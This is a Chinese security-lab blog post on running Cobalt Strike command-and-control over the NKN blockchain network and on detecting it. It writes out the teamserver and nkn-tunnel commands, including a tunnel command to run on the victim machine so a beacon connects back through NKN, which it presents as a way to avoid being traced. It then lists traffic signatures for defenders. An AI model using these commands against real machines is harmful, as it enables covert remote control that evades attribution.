CobaltStrike 区块链网络上线方式及检测

最近，看到有人研究了基于NKN区块链网络的CS上线方式，觉得很有意思，作者也打算验证一下，看看这种上线方式的优缺点，顺便研究一下有没有流量特征可供检测。

1.NKN网络介绍

NKN是一个点对点(peer-to-peer)去中心化网络，旨在颠覆传统的中心化的客户端-服务器模式互联网和通信网络，这种模式成本高昂、效率低下，并且容易受到攻击。通过在现有TCP/IP的基础上加入区块链层，NKN旨在帮助利用未使用的带宽和数据，这些带宽和数据通常在不同的用户之间低效地分布，从而允许个人和大型isp更好地优化数据使用，以提高网络速度和降低成本。可以用下面的图来理解NKN网络的作用：提供基于区块链模式的端到端传输网络能力。

用户可以将数据发送到NKN网络，通过大量的节点进行转发，不用考虑节点是服务器、路由器甚至PC机，直到数据被接收者接收。

因此基于这种技术，可以不需要vps搭建CS搭建服务端，便可进行端到端的通信。这种方法和基于云函数的上线方式有相似之处，都是基于其他第三方网络进行转发，不会泄露攻击者的vps地址等信息，防止被溯源。

2.NKN网络上线流程

环境及工具准备：

nkn-tunnelcobaltstrike4.0

2.1 本地监听teamserver

在本机上启动teamserver服务端，监听内网ip地址即可

teamserver.bat 192.168.0.4 justttest111

2.2 连接cs并创建listener

cs客户端连接本机的服务端，host为127.0.0.1

创建listener如下，其中192.168.0.4 为本机内网ip，443为cs服务端本地监听的端口，8081为木马需要连接的端口。

2.3 nkn流量转发

下载nkn-tunnel (https://github.com/nknorg/nkn-tunnel/releases/tag/v0.3.0 )，在本机上执行如下命令

nkn-tunnel -from nkn -to 127.0.0.1:443 -v

意思是将nkn网络的流量转发到本机的127.0.0.1:443，此时会生成一段64位seed：969c01125a876b214f1964edabecb4f59d3cdeb825309a6c71c4a1e4a306da58，这个seed可以自己设定，也可以随机生成。

在受害机器上执行，即将本机127.0.0.1:8081的流量转发到nkn网络seed为969c01125a876b214f1964edabecb4f59d3cdeb825309a6c71c4a1e4a306da58的端。

nkn-tunnel.exe -from 127.0.0.1:8081 -to 969c01125a876b214f1964edabecb4f59d3cdeb825309a6c71c4a1e4a306da58

2.4 执行恶意程序上线

这时，在受害机器上执行cs生成的beacon.exe，可以看到本机上已经接收到了来自受害机的流量请求。

可以正常地执行命令，并且延时也还不错。在整个过程中，没有使用有外网ip的vps搭建cs的server端，这个能很有效地防溯源。

3.流量特征及检测

有攻就有防，利用这种方式进行上线，虽然比较简单并且不需要vps，但我们也要看看其是否会有比较明显的特征。

首先看console，会有提示向http://seed.nkn.org:30003发起的POST请求，以及与节点 x.x.x.x:30002的tcp连接。

我们利用wireshark抓一下，nkn-tunnel连接到官方站点以及后续跟节点通信的数据包。首先是与seed.nkn.org的http请求，明显看到seed.nkn.org的域名，端口为30003，请求体中有”getwsaddr”等字符串特征，在响应体中返回了具体通信的节点地址、id、公钥等信息。

再看看与节点通信的数据包，会发起http请求后切换到websocket协议，随后一直以tcp和websocket进行通信。

查看具体的通信内容，可以发现请求部分为加密，响应内容部分可读，包含控制机的seed。

因此，对此种方式的上线特征还是比较明显的，可以从流量方向入手从以下3个方面：

• 受害机向seed.nkn.org:30003发起请求，获取节点地址等相关信息，并且请求体及响应中包含如getwsaddr、rpcAddr等关键字

• 受害机向节点的30002端口发起http、websocket请求

• 受害者与节点的通信内容会包含如”F__3__.64位seed”格式信息（默认），并且包含sigChainBlockHash、updateSigChainBlockHash等关键字

综上所述，如果使用nkn-tunnel+cs直接上线确实可以避免被直接溯源，而且节省了vps资源，但也会有比较明显的特征，在没有使用nkn网络的企业中，这些特征是非常明显的，很容易被流量设备识别到。

参考文章：

一个基于区块链网络的匿名远控

https://maka8ka.cc/post/%E4%B8%80%E4%B8%AA%E5%9F%BA%E4%BA%8E%E5%8C%BA%E5%9D%97%E9%93%BE%E7%BD%91%E7%BB%9C%E7%9A%84%E5%8C%BF%E5%90%8D%E8%BF%9C%E6%8E%A7/

去中心化上线CS

https://hosch3n.github.io/2021/11/10/%E5%8E%BB%E4%B8%AD%E5%BF%83%E5%8C%96%E4%B8%8A%E7%BA%BFCS/

原文始发于微信公众号（毕方安全实验室）：CobaltStrike 区块链网络上线方式及检测